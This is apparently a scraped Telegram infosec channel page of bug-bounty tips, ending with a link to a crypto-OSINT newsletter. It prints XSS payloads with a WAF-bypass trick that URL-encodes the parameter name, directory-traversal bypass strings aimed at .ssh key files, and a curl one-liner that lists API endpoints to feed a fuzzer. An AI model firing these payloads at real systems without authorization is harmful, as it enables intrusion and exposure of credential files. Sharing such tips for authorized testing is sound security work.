Information Security
413 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
XSS WAF Bypass Tip:

try url encoding the parameter name in your PoC URL!

?page=";confirm`1`//
Rightwards arrow
302

?pag%65=";confirm`1`//
Rightwards arrow
200 + XSS!

#bugbountytips
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

#payloads #payload #bypass
#bugbountytip #bugbounty Directory listing bypass payloads : Any file name or folder name ..%3B/
/%20../
/.ssh/authorized_keys
/.ssh/known_hosts
/%2e%2e/google.com
..%3B/////////////////////////////////
Return a list of endpoints from a swagger.json.
Pass them to your fuzzer(s), +profit?

curl -s hxxps://petstore.swagger.io/v2/swagger.json | jq '.paths | keys[]'

#bugbounty #bugbountytips #redteam #security #oneliner #bash
Lots to dive into this week's CryptOsint.

U.S. Treasury tries its hand at graphic design, Paul Singer & Jack Dorsey make up, AND Russian oligarchs are investing in Telegram's ICO.


https://mailchi.mp/782847570f22/us-treasury-shows-how-chinese-nationals-launder-money-for-dprk